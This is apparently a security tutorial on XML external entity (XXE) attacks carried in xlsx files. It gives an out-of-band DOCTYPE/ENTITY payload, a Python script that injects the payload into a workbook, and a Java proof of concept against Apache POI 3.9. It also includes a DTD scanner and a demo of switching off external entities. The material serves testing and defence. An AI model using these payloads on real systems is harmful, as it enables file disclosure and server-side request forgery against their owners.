XXE attacks via Excel


1. Overview

Since Office 2007, Microsoft Office has used the Office Open XML file formats, which are built on the ZIP container format. Rename a .xlsx to .zip and extract it, and most of what you find is XML: parts describing the workbook data, the metadata and the document properties.

xls and xlsx are different formats. xls is Microsoft's proprietary binary format, built on the OLE Compound File (structured storage) container; xlsx is XML-based, a ZIP package of XML parts. Because no XML parser is involved in reading an xls file, it cannot carry an XXE payload.
When testing, try both docx and xlsx, depending on what the feature under test accepts.

2. Building a malicious xlsx

Build the xlsx. Unpack the original into a working directory, edit the XML part there, then repack from inside that directory so the entry names stay relative ([Content_Types].xml and the _rels directories must end up at the top level of the new archive); the original's zip -r payload.xslx was a typo for .xlsx:

unzip payload.xlsx -d payload
cd payload
zip -r ../payload2.xlsx *

Add the XXE payload. The DOCTYPE goes right after the XML declaration of an XML part the target will parse (xl/workbook.xml is the usual choice), and the entity is referenced inside that part's content; the <x> wrapper below simply shows the two pieces together:

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://127.0.0.1:7788/xxe"> ]>
<x>&xxe;</x>

This is a blind, out-of-band payload: nothing is echoed back, but the parser fetches the SYSTEM URL, so a listener on 127.0.0.1:7788 sees a request for /xxe as soon as the file is parsed. Against a remote target, point the URL at a host you control.

[screenshot: the payload inserted into the XML part]
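To make the packaging step reproducible without a real workbook, here is an added Python example (not code from the original post). It builds a minimal valid xlsx in memory, injects the DOCTYPE/ENTITY payload above into a chosen part (xl/workbook.xml by default), repacks the archive with every other entry untouched, and, on the defensive side, scans an xlsx for any DTD declaration, a check an upload handler can run before the file reaches an XML parser. The workbook parts, the part name, the function names and the output file name are all this example's own assumptions.

```python
"""Build a malicious xlsx and scan one for DTD payloads (added example)."""
import io
import re
import zipfile

# Constructed sample: the smallest set of parts that opens as a workbook
# (one sheet with a single inline-string cell).
MINIMAL_XLSX_PARTS = {
    "[Content_Types].xml": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>'
        '<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
        '</Types>'
    ),
    "_rels/.rels": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>'
        '</Relationships>'
    ),
    "xl/workbook.xml": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>'
        '</workbook>'
    ),
    "xl/_rels/workbook.xml.rels": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
        '</Relationships>'
    ),
    "xl/worksheets/sheet1.xml": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetData><row r="1"><c r="A1" t="inlineStr"><is><t>hello</t></is></c></row></sheetData>'
        '</worksheet>'
    ),
}

XXE_DOCTYPE = '<!DOCTYPE x [ <!ENTITY xxe SYSTEM "{url}"> ]>'
XML_DECL_RE = re.compile(r"^<\?xml[^>]*\?>")
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def build_xlsx(parts):
    """Pack {entry name: xml text} into xlsx bytes (deflated, like zip -r)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


def inject_xxe(xlsx_bytes, part="xl/workbook.xml", url="http://127.0.0.1:7788/xxe"):
    """Return a copy of the xlsx whose `part` carries the DOCTYPE/ENTITY payload.

    The DOCTYPE is placed directly after the XML declaration and the entity
    is referenced once just before the closing root tag, so the parser
    resolves it while reading that part. Every other entry is copied as-is.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                text = data.decode("utf-8")
                m = XML_DECL_RE.match(text)
                decl, body = (text[:m.end()], text[m.end():]) if m else ("", text)
                close = body.rfind("</")  # position of the closing root tag
                body = body[:close] + "&xxe;" + body[close:]
                data = (decl + XXE_DOCTYPE.format(url=url) + body).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def find_dtd_parts(xlsx_bytes):
    """Defensive check: entries containing a DOCTYPE or ENTITY declaration.

    Legitimate OOXML parts do not carry a DTD, so any hit is reason to
    reject the file before it reaches an XML parser.
    """
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return [i.filename for i in zf.infolist() if DTD_RE.search(zf.read(i.filename))]


def read_part(xlsx_bytes, name):
    """Return one entry of the package as text (used to inspect results)."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return zf.read(name).decode("utf-8")


if __name__ == "__main__":
    clean = build_xlsx(MINIMAL_XLSX_PARTS)
    evil = inject_xxe(clean)
    with open("payload2.xlsx", "wb") as f:  # assumed output name
        f.write(evil)
    print("DTD parts in clean file:", find_dtd_parts(clean))
    print("DTD parts in payload file:", find_dtd_parts(evil))
```

The scan is byte-based on purpose: it runs before any XML parser touches the file, so a malformed or oversized part cannot trigger anything during the check itself. Rejecting on DOCTYPE alone also catches entity-expansion (billion laughs) payloads, not just external entities.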

3. Reproducing in IDEA

import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;


public class poc {

    public static void main(String[] args) throws IOException {
        File excelFile = new File("/Users/garck/D/java-code/javaStudy/excel_xxe/2/payload2.xlsx");

        // Opening the workbook is what fires the XXE: POI 3.9 parses the XML
        // parts inside the zip container here, and the external entity is
        // resolved during that parse, before a single cell is read.
        try (FileInputStream in = new FileInputStream(excelFile)) {
            XSSFWorkbook workbook = new XSSFWorkbook(in);

            XSSFSheet sheet = workbook.getSheetAt(0);

            // Dump every cell. toString() works for any cell type, whereas
            // getStringCellValue() throws on numeric cells.
            for (Row row : sheet) {
                for (Cell cell : row) {
                    System.out.print(cell.toString() + " ");
                }
                System.out.println();
            }
        }
    }
}

pom.xml (poi-ooxml 3.9 is used on purpose: the XXE in POI's OPC SAX setup, CVE-2014-3529, was fixed in 3.10.1, so later versions do not reproduce it)

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>excel_xxe</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>poi-ooxml</artifactId>
            <version>3.9</version>
        </dependency>
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>ooxml-schemas</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
</project>

Reproduction screenshot:

[screenshot: the listener on 127.0.0.1:7788 receiving the request when the workbook is opened]
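The POI reproduction above works only because the parser resolves external general entities. As an added example (not from the original post, and using Python's xml.sax in place of Apache POI), the script below parses a workbook.xml carrying the same payload twice: once with feature_external_ges enabled, which is the behaviour the unpatched POI 3.9 parser exhibits, and once with it disabled, which is the hardened setting. So that it runs offline, the entity points at a temporary local file instead of the post's http://127.0.0.1:7788/xxe listener; the file contents, the element layout and the function names are constructed for this example, and the file:// URL assumes a POSIX absolute path.

```python
"""Resolve vs. ignore external entities on the payload workbook.xml (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects every run of character data the parser emits."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def workbook_with_xxe(url):
    """workbook.xml carrying the post's DOCTYPE payload (constructed sample)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<!DOCTYPE x [ <!ENTITY xxe SYSTEM "%s"> ]>'
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheets><sheet name="Sheet1" sheetId="1"/></sheets>&xxe;</workbook>'
    ) % url


def parse_workbook(xml_text, resolve_external):
    """Parse the part with xml.sax and return the character data it produced.

    resolve_external=True is the unsafe configuration: the parser fetches the
    entity's SYSTEM URL (file://, http://, ...) and splices the response into
    the document, which is exactly what the xlsx payload relies on. Python's
    xml.sax has had this feature off by default since 3.7.1; it is set
    explicitly here so the result does not depend on the interpreter version.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return handler.text()


def demo():
    """Point the entity at a local 'secret' file and parse it both ways."""
    with tempfile.NamedTemporaryFile("wb", suffix=".txt", delete=False) as f:
        f.write(b"secret-token-123")  # constructed stand-in for a sensitive file
        path = f.name
    try:
        xml_text = workbook_with_xxe("file://" + path)  # assumes a POSIX absolute path
        return {
            "external_entities_on": parse_workbook(xml_text, True),
            "external_entities_off": parse_workbook(xml_text, False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, text in demo().items():
        print("%s: %r" % (mode, text))
```

With the feature on, the file's contents show up as ordinary character data inside the workbook element, which is the same mechanism that turns the http:// URL in the post into an out-of-band request. With the feature off, the reference is simply skipped and the document still parses, so disabling external entities (or, for POI, upgrading past 3.10.1) costs nothing for legitimate OOXML input, which never uses a DTD.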